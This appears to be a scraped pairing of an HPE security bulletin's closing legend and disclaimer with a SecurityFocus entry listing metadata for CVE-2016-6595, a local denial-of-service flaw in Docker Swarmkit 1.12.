3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

-----END PGP SIGNATURE-----



SecurityFocus Vulnerabilities

Docker Swarmkit Local Denial of Service Vulnerability

Bugtraq ID: 92195
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6595
Remote: No
Local: Yes
Published: Jul 29 2016 12:00AM
Updated: Aug 04 2016 07:00PM
Credit: zhangkaixiang.
Vulnerable: Docker swarmkit 1.12
Not Vulnerable:


SecurityFocus Vulnerabilities